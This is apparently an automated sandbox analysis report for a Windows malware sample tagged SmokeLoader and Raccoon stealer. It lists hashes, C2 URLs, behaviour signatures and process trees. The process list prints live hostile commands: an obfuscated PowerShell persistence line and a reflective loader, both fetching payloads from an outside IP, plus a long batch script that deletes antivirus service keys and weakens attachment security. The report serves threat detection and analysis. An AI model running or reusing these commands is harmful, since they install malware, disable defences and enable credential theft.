Analysis

max time kernel: 152s
max time network: 151s
platform: windows10_x64
resource: win10v20210410
submitted: 13-08-2021 14:32

Static task: static1

Behavioral task: behavioral1
  Sample: 1bbe3a3f1efad030be690f626257483a.exe
  Resource: win7v20210410

Behavioral task: behavioral2
  Sample: 1bbe3a3f1efad030be690f626257483a.exe
  Resource: win10v20210410

General

Target: 1bbe3a3f1efad030be690f626257483a.exe
Size: 180KB
MD5: 1bbe3a3f1efad030be690f626257483a
SHA1: 06d2221210b3ff3336a5dade2e43d689697e8002
SHA256: cce6188efa2820773071b644fec917c57d553da1d0f4571b7056b6aaf2f11249
SHA512: 63f6f76b7181f2fd6f88e161c8cd5f99da2197e2845d382628a890099e3bd99e8a85a6d1981961ad01383da10995223ba030531cea3561afa0e3752a1d51cbf4
Malware Config
Extracted
http://193.56.146.55/Api/GetFile2
Extracted
smokeloader
2020
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
url4cnc: https://telete.in/jagressor_kz

Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
url4cnc: https://telete.in/p1rosto100xx
Signatures

Raccoon Stealer Payload (5 IoCs)
Processes:
  resource | yara_rule
  behavioral2/memory/1292-139-0x00000000048B0000-0x0000000004941000-memory.dmp | family_raccoon
  behavioral2/memory/1292-140-0x0000000000400000-0x0000000002CA9000-memory.dmp | family_raccoon
  behavioral2/memory/1300-220-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon
  behavioral2/memory/1300-221-0x000000000044003F-mapping.dmp | family_raccoon
  behavioral2/memory/1300-233-0x0000000000400000-0x0000000000495000-memory.dmp | family_raccoon

SmokeLoader
Modular backdoor trojan in use since 2014.

Suspicious use of NtCreateProcessExOtherParentProcess (1 IoCs)
Processes:
  description | pid | process | target process
  PID 1928 created 1292 | 1928 | WerFault.exe | 8247.exe

Blocklisted process makes network request (1 IoCs)
Processes:
  flow | pid | process
  24 | 2884 | powershell.exe

Downloads MZ/PE file

Executes dropped EXE (5 IoCs)
Processes:
  pid | process
  8 | 7DFF.exe
  4088 | 7F77.exe
  1292 | 8247.exe
  3844 | Runtimebroker.exe
  1300 | 7F77.exe

Deletes itself (1 IoCs)
Processes:
  pid | process
  2984 | (process column blank in the report)

Drops startup file (1 IoCs)
Processes:
  description | ioc | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk | Runtimebroker.exe

Loads dropped DLL (1 IoCs)
Processes:
  pid | process
  1300 | 7F77.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 1 IoCs)
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" | powershell.exe

Suspicious use of SetThreadContext (2 IoCs)
Processes:
  description | pid | process | target process
  PID 3788 set thread context of 2364 | 3788 | 1bbe3a3f1efad030be690f626257483a.exe | 1bbe3a3f1efad030be690f626257483a.exe
  PID 4088 set thread context of 1300 | 4088 | 7F77.exe | 7F77.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (18 IoCs)
Processes:
  pid | pid_target | process | target process
  3924 | 8 | WerFault.exe | 7DFF.exe
  3692 | 8 | WerFault.exe | 7DFF.exe
  2788 | 8 | WerFault.exe | 7DFF.exe
  2892 | 1292 | WerFault.exe | 8247.exe
  2772 | 8 | WerFault.exe | 7DFF.exe
  1964 | 1292 | WerFault.exe | 8247.exe
  2128 | 8 | WerFault.exe | 7DFF.exe
  3024 | 1292 | WerFault.exe | 8247.exe
  3768 | 8 | WerFault.exe | 7DFF.exe
  3272 | 1292 | WerFault.exe | 8247.exe
  1928 | 1292 | WerFault.exe | 8247.exe
  2336 | 3844 | WerFault.exe | Runtimebroker.exe
  868 | 3844 | WerFault.exe | Runtimebroker.exe
  1520 | 3844 | WerFault.exe | Runtimebroker.exe
  4016 | 3844 | WerFault.exe | Runtimebroker.exe
  212 | 3844 | WerFault.exe | Runtimebroker.exe
  428 | 3844 | WerFault.exe | Runtimebroker.exe
  3788 | 1300 | WerFault.exe | 7F77.exe

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 1bbe3a3f1efad030be690f626257483a.exe
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 1bbe3a3f1efad030be690f626257483a.exe
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 1bbe3a3f1efad030be690f626257483a.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes (repeated rows collapsed, count in parentheses):
  pid | process
  2364 | 1bbe3a3f1efad030be690f626257483a.exe (2 entries)
  2984 | (process column blank in the report) (62 entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes:
  pid | process
  2984 | (process column blank in the report)

Suspicious behavior: MapViewOfSection (19 IoCs)
Processes (repeated rows collapsed, count in parentheses):
  pid | process
  2364 | 1bbe3a3f1efad030be690f626257483a.exe (1 entry)
  2984 | (process column blank in the report) (18 entries)

Suspicious use of AdjustPrivilegeToken (39 IoCs)
Processes (in report order; the process column is blank for pid 2984):
  description | pid | process
  Token: SeDebugPrivilege | 3692 | WerFault.exe
  Token: SeDebugPrivilege | 2788 | WerFault.exe
  Token: SeDebugPrivilege | 2892 | WerFault.exe
  Token: SeDebugPrivilege | 2772 | WerFault.exe
  Token: SeDebugPrivilege | 1964 | WerFault.exe
  Token: SeDebugPrivilege | 2128 | WerFault.exe
  Token: SeDebugPrivilege | 3024 | WerFault.exe
  Token: SeDebugPrivilege | 3768 | WerFault.exe
  Token: SeDebugPrivilege | 3272 | WerFault.exe
  Token: SeDebugPrivilege | 1928 | WerFault.exe
  Token: SeDebugPrivilege | 2336 | WerFault.exe
  Token: SeShutdownPrivilege | 2984 |
  Token: SeCreatePagefilePrivilege | 2984 |
  Token: SeShutdownPrivilege | 2984 |
  Token: SeCreatePagefilePrivilege | 2984 |
  Token: SeShutdownPrivilege | 2984 |
  Token: SeCreatePagefilePrivilege | 2984 |
  Token: SeDebugPrivilege | 868 | WerFault.exe
  Token: SeDebugPrivilege | 1520 | WerFault.exe
  Token: SeDebugPrivilege | 4016 | WerFault.exe
  Token: SeDebugPrivilege | 212 | WerFault.exe
  Token: SeDebugPrivilege | 428 | WerFault.exe
  Token: SeDebugPrivilege | 3544 | powershell.exe
  Token: SeDebugPrivilege | 2884 | powershell.exe
  Token: SeDebugPrivilege | 4088 | 7F77.exe
  Token: SeDebugPrivilege | 2336 | powershell.exe
  Token: SeShutdownPrivilege | 2984 |
  Token: SeCreatePagefilePrivilege | 2984 |
  Token: SeDebugPrivilege | 3788 | WerFault.exe
  Token: SeShutdownPrivilege | 2984 |
  Token: SeCreatePagefilePrivilege | 2984 |
  Token: SeShutdownPrivilege | 2984 |
  Token: SeCreatePagefilePrivilege | 2984 |
  Token: SeShutdownPrivilege | 2984 |
  Token: SeCreatePagefilePrivilege | 2984 |
  Token: SeShutdownPrivilege | 2984 |
  Token: SeCreatePagefilePrivilege | 2984 |
  Token: SeShutdownPrivilege | 2984 |
  Token: SeCreatePagefilePrivilege | 2984 |
  Token: SeShutdownPrivilege | 2984 |
  Token: SeCreatePagefilePrivilege | 2984 |

Suspicious use of UnmapMainImage (1 IoCs)
Processes:
  pid | process
  2984 | (process column blank in the report)

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (consecutive identical rows collapsed, count in parentheses; the process column is blank for pid 2984):
  description | pid | process | target process
  PID 3788 wrote to memory of 2364 | 3788 | 1bbe3a3f1efad030be690f626257483a.exe | 1bbe3a3f1efad030be690f626257483a.exe (6 entries)
  PID 2984 wrote to memory of 8 | 2984 | | 7DFF.exe (3 entries)
  PID 2984 wrote to memory of 4088 | 2984 | | 7F77.exe (3 entries)
  PID 2984 wrote to memory of 1292 | 2984 | | 8247.exe (3 entries)
  PID 2984 wrote to memory of 1116 | 2984 | | explorer.exe (4 entries)
  PID 2984 wrote to memory of 3352 | 2984 | | explorer.exe (3 entries)
  PID 2984 wrote to memory of 3088 | 2984 | | explorer.exe (4 entries)
  PID 8 wrote to memory of 3844 | 8 | 7DFF.exe | Runtimebroker.exe (3 entries)
  PID 2984 wrote to memory of 2220 | 2984 | | explorer.exe (3 entries)
  PID 2984 wrote to memory of 1216 | 2984 | | explorer.exe (4 entries)
  PID 2984 wrote to memory of 3592 | 2984 | | explorer.exe (3 entries)
  PID 2984 wrote to memory of 2744 | 2984 | | explorer.exe (4 entries)
  PID 2984 wrote to memory of 3400 | 2984 | | explorer.exe (3 entries)
  PID 2984 wrote to memory of 3004 | 2984 | | explorer.exe (4 entries)
  PID 3844 wrote to memory of 3544 | 3844 | Runtimebroker.exe | powershell.exe (3 entries)
  PID 3844 wrote to memory of 2884 | 3844 | Runtimebroker.exe | powershell.exe (3 entries)
  PID 4088 wrote to memory of 1300 | 4088 | 7F77.exe | 7F77.exe (8 entries)
Processes

C:\Users\Admin\AppData\Local\Temp\1bbe3a3f1efad030be690f626257483a.exe (depth 1)
  command line: "C:\Users\Admin\AppData\Local\Temp\1bbe3a3f1efad030be690f626257483a.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\1bbe3a3f1efad030be690f626257483a.exe (depth 2)
    command line: "C:\Users\Admin\AppData\Local\Temp\1bbe3a3f1efad030be690f626257483a.exe"
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection

C:\Users\Admin\AppData\Local\Temp\7DFF.exe (depth 1)
  command line: C:\Users\Admin\AppData\Local\Temp\7DFF.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WerFault.exe (depth 2)
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 788
    - Program crash

  C:\Windows\SysWOW64\WerFault.exe (depth 2)
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 824
    - Program crash
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WerFault.exe (depth 2)
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 760
    - Program crash
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WerFault.exe (depth 2)
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 912
    - Program crash
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WerFault.exe (depth 2)
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 828
    - Program crash
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WerFault.exe (depth 2)
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 924
    - Program crash
    - Suspicious use of AdjustPrivilegeToken

  C:\ProgramData\Runtimebroker.exe (depth 2)
    command line: "C:\ProgramData\Runtimebroker.exe"
    - Executes dropped EXE
    - Drops startup file
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WerFault.exe (depth 3)
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 732
      - Program crash
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WerFault.exe (depth 3)
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 784
      - Program crash
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WerFault.exe (depth 3)
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 764
      - Program crash
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WerFault.exe (depth 3)
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 796
      - Program crash
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WerFault.exe (depth 3)
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 992
      - Program crash
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WerFault.exe (depth 3)
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 1016
      - Program crash
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      command line: powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
      - Adds Run key to start application
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      command line: powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
      - Blocklisted process makes network request
      - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        command line: "powershell" Get-MpPreference -verbose
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\cmd.exe (depth 4; the full command line, as recorded by the sandbox, follows)
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete 
"HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t 
REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d 
"%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete 
